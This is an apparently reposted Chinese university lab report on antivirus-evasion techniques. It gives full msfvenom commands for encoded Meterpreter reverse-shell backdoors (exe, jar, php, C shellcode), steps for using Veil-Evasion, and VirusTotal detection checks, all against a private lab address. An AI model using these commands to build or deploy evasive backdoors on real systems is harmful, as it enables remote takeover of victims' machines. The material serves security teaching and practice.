2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

Posted zhuyue-study

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践相关的知识,希望对你有一定的参考价值。

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

**免杀**
- 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
- 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
- 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。

实验内容

任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

1、使用msf编码器生成后门程序
技术图片

2、使用virus total 进行测试
技术图片

3、使用msf编码器编码15次后门程序,看看有何效果

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\\x00’ LHOST=192.168.142.129 LPORT=5227 -f exe > met-encoded15.exe

技术图片

4、使用msfvenom生成jar和php

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.129 lport=5227 x> 20165227_backdoor_java.jar

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.129 lport=5227 x> 20165227_backdoor.php

技术图片

5、使用veil-evasion进行后门生成(安装耗时太久,各种问题)安装可参照Veil-Evasion安装

  • 在``Veil-Evasion文件夹下输入命令./Veil-Evasion.py``` 启动
    技术图片

  • 使用命令:use 然后 7 设置IP和端口
    技术图片

  • 使用generate 生成后门
    技术图片

  • 使用virus total 进行测试
    技术图片

6、利用shellcode编程

  • 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.129 LPORT=5227 -f c
    技术图片

任务二:Linux平台交叉编译Windows应用

以上是关于2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践的主要内容,如果未能解决你的问题,请参考以下文章

2018-2019-2 网络对抗技术 20165212 Exp7 网络欺诈防范

2018-2019-2 网络对抗技术 20165318 Exp7 网络欺诈防范

2018-2019-2 20165209 《网络对抗技术》 Kali安装

2018-2019-2 20165316《网络对抗技术》Exp7 网络欺诈防范

2018-2019-2 网络对抗技术 20165324 Exp7:网络欺诈防范

2018-2019-2 20165210《网络对抗技术》Exp7 网络欺诈防范